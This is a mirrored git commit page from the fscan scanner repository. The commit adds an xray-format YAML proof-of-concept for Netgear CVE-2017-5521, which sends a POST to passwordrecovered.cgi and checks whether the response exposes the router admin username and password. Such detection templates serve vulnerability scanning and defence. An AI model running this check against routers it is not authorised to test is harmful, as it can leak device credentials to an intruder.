mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-netgear-cve-2017-5521
|
||||
rules:
|
||||
- method: POST
|
||||
path: /passwordrecovered.cgi?id=get_rekt
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left")
|
||||
detail:
|
||||
author: betta(https://github.com/betta-cyber)
|
||||
links:
|
||||
- https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html
|
||||
Reference in New Issue
Block a user